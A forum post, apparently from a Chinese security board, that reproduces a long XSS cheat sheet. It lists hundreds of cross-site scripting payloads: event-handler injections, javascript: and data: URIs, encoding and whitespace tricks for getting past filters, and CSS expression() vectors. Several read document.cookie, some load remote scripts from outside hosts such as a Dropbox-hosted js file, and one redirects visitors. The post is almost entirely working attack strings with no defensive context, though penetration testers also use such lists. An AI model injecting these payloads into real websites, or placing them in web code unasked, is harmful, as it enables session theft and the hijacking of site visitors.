搜索
查看: 133|回复: 0

XSS Cheat Sheet

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-4-7 13:56:31 | 显示全部楼层 |阅读模式
  1. xss Vectors Cheat Sheet

  2. <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=alert`1`>
  3. %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
  4. "</script><script>alert(String.fromCharCode(88,83,83))</script>
  5. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  6. <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
  7. <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
  8. <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
  9. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  10. <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
  11. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  12. <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
  13. <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
  14. <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
  15. <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
  16. <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
  17. <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
  18. <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
  19. <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
  20. <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
  21. <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
  22. <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
  23. <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
  24. <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
  25. <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
  26. <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
  27. <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
  28. <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
  29. <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
  30. <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
  31. <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
  32. <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
  33. <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
  34. <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
  35. <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
  36. <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
  37. <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
  38. <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
  39. <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
  40. <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
  41. <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
  42. <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
  43. <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
  44. <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
  45. <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
  46. <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
  47. <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
  48. <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
  49. <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
  50. <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
  51. <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
  52. <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
  53. <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
  54. <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
  55. <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
  56. <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
  57. <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
  58. <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
  59. <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
  60. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  61. <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
  62. <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
  63. <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
  64. <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
  65. <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
  66. <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
  67. <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
  68. <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
  69. <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
  70. <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
  71. <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
  72. <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
  73. <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
  74. <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
  75. <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
  76. <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
  77. <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
  78. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
  79. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  80. <INPUT TYPE="BUTTON" action="alert('XSS')"/>
  81. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  82. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  83. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  84. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  85. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  86. "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
  87. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  88. "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
  89. ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
  90. g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
  91. <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
  92. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  93. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  94. <iframe src=http://xss.rocks/scriptlet.html <
  95. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  96. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  97. <iframe  src="        javascript:prompt(1)        ">
  98. <svg><style>{font-family:'<iframe/onload=confirm(1)>'
  99. <input/onmouseover="javaSCRIPT:confirm(1)"
  100. <sVg><scRipt >alert(1) {Opera}
  101. <img/src=`` onerror=this.onerror=confirm(1)
  102. <form><isindex formaction="javascript:confirm(1)"
  103. <img src=``
  104. onerror=alert(1)

  105. <script/         src='https://dl.dropbox.com/u/13018058/js.js' /        ></script>
  106. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  107. <iframe/src="data:text/html;        base64        ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  108. <script /**/>/**/alert(1)/**/</script /**/
  109. "><h1/onmouseover='\u0061lert(1)'>
  110. <iframe/src="data:text/html,<svg onload=alert(1)>">
  111. <meta content="
  112. 1
  113. ; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
  114. <svg><script xlink:href=data:,window.open('https://www.google.com/') </script
  115. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  116. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  117. <iframe src=javascript:alert(document.location)>
  118. <form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
  119. <img/       
  120. src=`~` onerror=prompt(1)>
  121. <form><iframe        
  122. src="javascript:alert(1)"
  123.         ;>
  124. <a href="data:application/x-x509-user-cert;
  125. base64
  126. ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="       
  127. >X</a
  128. http://www.google<script .com>alert(document.location)</script
  129. <a href=[&#65533;]"&#65533; onmouseover=prompt(1)//">XYZ</a
  130. <img/src=@
  131. onerror = prompt('1')
  132. <style/onload=prompt('XSS')
  133. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  134. </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
  135. &#65533;</form><input type="date" onfocus="alert(1)">
  136. <form><textarea
  137. onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
  138. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  139. <iframe srcdoc='<body onload=prompt(1)>'>
  140. <a href="javascript:void(0)" onmouseover=
  141. javascript:alert(1)
  142. >X</a>
  143. <script ~~~>alert(0%0)</script ~~~>
  144. <style/onload=<!--        >
  145. alert
  146. (1)>
  147. <///style///><span %2F onmousemove='alert(1)'>SPAN
  148. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=        prompt(1)
  149. "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

  150. <blink/
  151. onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
  152. <marquee onstart='javascript:alert(1)'>^__^
  153. <div/style="width:expression(confirm(1))">X</div> {IE7}
  154. <iframe// src=javaSCRIPT:alert(1)
  155. //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
  156. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  157. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  158. </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
  159. <a/href="javascript:
  160. javascript:prompt(1)"><input type="X">
  161. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  162. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
  163. <a href="javascript:\u0061le%72t(1)"><button>
  164. <div onmouseover='alert(1)'>DIV</div>
  165. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  166. <a href="jAvAsCrIpT:alert(1)">X</a>
  167. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  168. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  169. <var onmouseover="prompt(1)">On Mouse Over</var>
  170. <a href=javascript:alert(document.cookie)>Click Here</a>
  171. <img src="/" =_=" title="onerror='prompt(1)'">
  172. <%<!--'%><script>alert(1);</script -->
  173. <script src="data:text/javascript,alert(1)"></script>
  174. <iframe/src \/\/onload = prompt(1)
  175. <iframe/onreadystatechange=alert(1)
  176. <svg/onload=alert(1)
  177. <input value=<><iframe/src=javascript:confirm(1)
  178. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  179. http://www.<script>alert(1)</script .com
  180. <iframe src=j
  181.         a
  182.                 v
  183.                         a
  184.                                 s
  185.                                         c
  186.                                                 r
  187.                                                         i
  188.                                                                 p
  189.                                                                         t
  190.                                                                                 :a
  191.                                                                                         l
  192.                                                                                                 e
  193.                                                                                                         r
  194.                                                                                                                 t
  195.                                                                                                                         28
  196.                                                                                                                                 1
  197.                                                                                                                                         %29></iframe>
  198. <svg><script ?>alert(1)
  199. <iframe src=j        a        v        a        s        c        r        i        p        t        :a        l        e        r        t        %28        1        %29></iframe>
  200. <img src=`xx:xx`onerror=alert(1)>
  201. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  202. <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
  203. <math><a xlink:href="//jsfiddle.net/t846h/">click
  204. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  205. <svg contentScriptType=text/vbs><script>MsgBox+1
  206. <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
  207. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  208. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  209. <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  210. <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
  211. <object data=javascript:\u0061le%72t(1)>
  212. <script>+-+-1-+-+alert(1)</script>
  213. <body/onload=<!-->
  214. alert(1)>
  215. <script itworksinallbrowsers>/*<script* */alert(1)</script
  216. <img src ?itworksonchrome?\/onerror = alert(1)
  217. <svg><script>//
  218. confirm(1);</script </svg>
  219. <svg><script onlypossibleinopera:-)> alert(1)
  220. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
  221. <script x> alert(1) </script 1=2
  222. <div/onmouseover='alert(1)'> style="x:">
  223. <--`<img/src=` onerror=alert(1)> --!>
  224. <script/src=data:text/javascript,alert(1)></script>
  225. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  226. "><img src=x onerror=window.open('https://www.google.com/');>
  227. <form><button formaction=javascript:alert(1)>CLICKME
  228. <math><a xlink:href="//jsfiddle.net/t846h/">click
  229. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  230. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  231. <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>&#8203;">Click Me</a>
  232. <script\x20type="text/javascript">javascript:alert(1);</script>
  233. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  234. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  235. <script\x09type="text/javascript">javascript:alert(1);</script>
  236. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  237. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  238. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  239. '`"><\x3Cscript>javascript:alert(1)</script>        
  240. '`"><\x00script>javascript:alert(1)</script>
  241. <img src=1 href=1 onerror="javascript:alert(1)"></img>
  242. <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  243. <video src=1 href=1 onerror="javascript:alert(1)"></video>
  244. <body src=1 href=1 onerror="javascript:alert(1)"></body>
  245. <image src=1 href=1 onerror="javascript:alert(1)"></image>
  246. <object src=1 href=1 onerror="javascript:alert(1)"></object>
  247. <script src=1 href=1 onerror="javascript:alert(1)"></script>
  248. <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  249. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  250. <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  251. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  252. <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  253. <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  254. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  255. <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  256. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  257. <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  258. <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  259. <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  260. <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  261. <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  262. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  263. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  264. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  265. <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  266. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  267. <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  268. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  269. <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  270. <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  271. <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  272. <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  273. <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  274. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  275. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  276. <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
  277. <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  278. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  279. <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  280. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  281. <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  282. <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  283. <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  284. <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  285. <object onError object onError="javascript:javascript:alert(1)"></object onError>
  286. <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  287. <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  288. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  289. <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  290. <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  291. <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  292. <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  293. <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  294. <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  295. <body onload body onload="javascript:javascript:alert(1)"></body onload>
  296. <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  297. <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  298. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  299. <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  300. <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  301. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  302. <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  303. <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  304. <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  305. <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  306. \x3Cscript>javascript:alert(1)</script>
  307. '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
  308. <script>javascript:alert(1)</script\x0D
  309. <script>javascript:alert(1)</script\x0A
  310. <script>javascript:alert(1)</script\x0B
  311. <script charset="\x22>javascript:alert(1)</script>
  312. <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  313. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
  314. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
  315. --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
  316. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
  317. `"'><img src='#\x27 onerror=javascript:alert(1)>
  318. <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  319. "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
  320. <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  321. <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  322. <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  323. <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  324. <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  325. <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  326. <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  327. <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  328. <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  329. <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  330. <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  331. <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  332. <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  333. <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
  334. <script>/* *\x2A/javascript:alert(1)// */</script>
  335. <script>/* *\x00/javascript:alert(1)// */</script>
  336. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  337. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  338. <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  339. <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  340. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  341. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
  342. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
  343. <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  344. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  345. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  346. '`"><\x3Cscript>javascript:alert(1)</script>
  347. '`"><\x00script>javascript:alert(1)</script>
  348. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
  349. "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
  350. <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  351. <script src="data:\xD4\x8F,javascript:alert(1)"></script>
  352. <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  353. <script src="data:\xCB\x8F,javascript:alert(1)"></script>
  354. <script\x20type="text/javascript">javascript:alert(1);</script>
  355. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  356. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  357. <script\x09type="text/javascript">javascript:alert(1);</script>
  358. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  359. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  360. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  361. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
  362. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
  363. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
  364. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
  365. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
  366. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
  367. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
  368. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
  369. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
  370. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
  371. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
  372. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
  373. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
  374. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
  375. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
  376. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
  377. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
  378. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
  379. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
  380. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
  381. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
  382. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
  383. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
  384. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
  385. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
  386. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
  387. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
  388. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  389. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  390. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  391. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  392. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  393. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  394. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  395. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  396. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  397. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  398. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  399. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  400. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  401. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  402. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  403. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  404. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  405. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  406. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  407. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  408. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  409. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  410. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  411. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  412. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  413. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  414. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  415. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  416. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  417. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  418. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  419. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  420. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  421. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  422. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  423. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  424. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
